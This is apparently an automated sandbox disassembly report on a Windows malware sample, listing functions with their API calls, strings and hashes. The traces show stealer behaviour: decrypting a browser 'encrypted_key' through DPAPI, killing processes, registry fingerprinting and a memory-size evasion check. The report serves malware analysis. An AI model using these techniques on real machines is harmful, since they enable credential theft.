Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: cfd24de15abb3e259a182299b4359d2b9825468d5ba3927af48a5733a90a4632
Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
Opcode Fuzzy Hash: cfd24de15abb3e259a182299b4359d2b9825468d5ba3927af48a5733a90a4632
Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 130c5661102d43b29e5521ff4af1d74c869a24989ed2b5e818e59a482b5e8b56
Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
Opcode Fuzzy Hash: 130c5661102d43b29e5521ff4af1d74c869a24989ed2b5e818e59a482b5e8b56
Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
CloseHandle.KERNEL32(00000000), ref: 00419A79
CloseHandle.KERNEL32(0040A056), ref: 00419A88

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51

Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
HeapAlloc.KERNEL32(00000000), ref: 0041783B
RegOpenKeyExA.KERNEL32(80000002,02D41110,00000000,00020119,00000000), ref: 0041786D
RegQueryValueExA.KERNEL32(00000000,02D456E0,00000000,00000000,?,000000FF), ref: 0041788E
RegCloseKey.ADVAPI32(00000000), ref: 00417898

Strings

Windows 11, xrefs: 0041784D

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55

Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
HeapAlloc.KERNEL32(00000000), ref: 004178CB
RegOpenKeyExA.KERNEL32(80000002,02D41110,00000000,00020119,00417849), ref: 004178EB
RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
RegCloseKey.ADVAPI32(00417849), ref: 00417914

Strings

CurrentBuildNumber, xrefs: 00417901

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91

Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414325
RegOpenKeyExA.KERNEL32(80000001,02D45D30,00000000,00020119,?), ref: 00414344
RegQueryValueExA.ADVAPI32(?,02D45368,00000000,00000000,00000000,000000FF), ref: 00414368
RegCloseKey.ADVAPI32(?), ref: 00414372
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
lstrcatA.KERNEL32(?,02D45380), ref: 004143AB

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1

Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
LocalFree.KERNEL32(00410447), ref: 0040A1E0
CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: df5df4ef70df121073a4f2170248f5e3bb6deef9be2cb02db738cf7876d15872
Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
Opcode Fuzzy Hash: df5df4ef70df121073a4f2170248f5e3bb6deef9be2cb02db738cf7876d15872
Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6

Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
lstrcatA.KERNEL32(?,00421058), ref: 004151E7
lstrcatA.KERNEL32(?,02D3E308), ref: 004151FB
lstrcatA.KERNEL32(?,0042105C), ref: 0041520D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

cA, xrefs: 00415235, 0041526A, 0041528F, 00415238, 0041526D

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: cA
API String ID: 2667927680-2872761854
Opcode ID: c4d7fef886b2f1415aff739d8f1ad0140d6d8b7ad9be95c1ee9a892ecbf21eca
Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
Opcode Fuzzy Hash: c4d7fef886b2f1415aff739d8f1ad0140d6d8b7ad9be95c1ee9a892ecbf21eca
Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D

Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323

Strings

, xrefs: 0040A511
"encrypted_key":", xrefs: 0040A480
DPAPI, xrefs: 0040A4D9

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 511d4697851f862d8223cb4c1abb6c4211960c1d0d99613b711b70ad12d08ee6
Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
Opcode Fuzzy Hash: 511d4697851f862d8223cb4c1abb6c4211960c1d0d99613b711b70ad12d08ee6
Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A

Function 6CE5C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CE5C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CE5C969
GetSystemInfo.KERNEL32(?), ref: 6CE5C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CE5C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CE5C9E2

Memory Dump Source

Source File: 00000000.00000002.1798696975.000000006CE41000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CE40000, based on PE: true

Associated: 00000000.00000002.1798670349.000000006CE40000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798825296.000000006CECE000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798873657.000000006CED2000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce40000_HrxOpVxK5d.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 70c5b9cdc0ea348a5c553929476a8335424464e556d92285e3dda5f0e330e0a8
Instruction ID: bda3e9a8f35100d218ee887aa1863739034c8441f1bca9c6f2cc5cf77da8270a
Opcode Fuzzy Hash: 70c5b9cdc0ea348a5c553929476a8335424464e556d92285e3dda5f0e330e0a8
Instruction Fuzzy Hash: 00212C71B412086BDB15AB24CC94BAE73B9AB4B704FB0152DF923A7B40DB715D40C7A1

Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
HeapAlloc.KERNEL32(00000000), ref: 00417FCE
RegOpenKeyExA.KERNEL32(80000002,02D41378,00000000,00020119,?), ref: 00417FEE
RegQueryValueExA.KERNEL32(?,02D45EF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
RegCloseKey.ADVAPI32(?), ref: 00418022

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
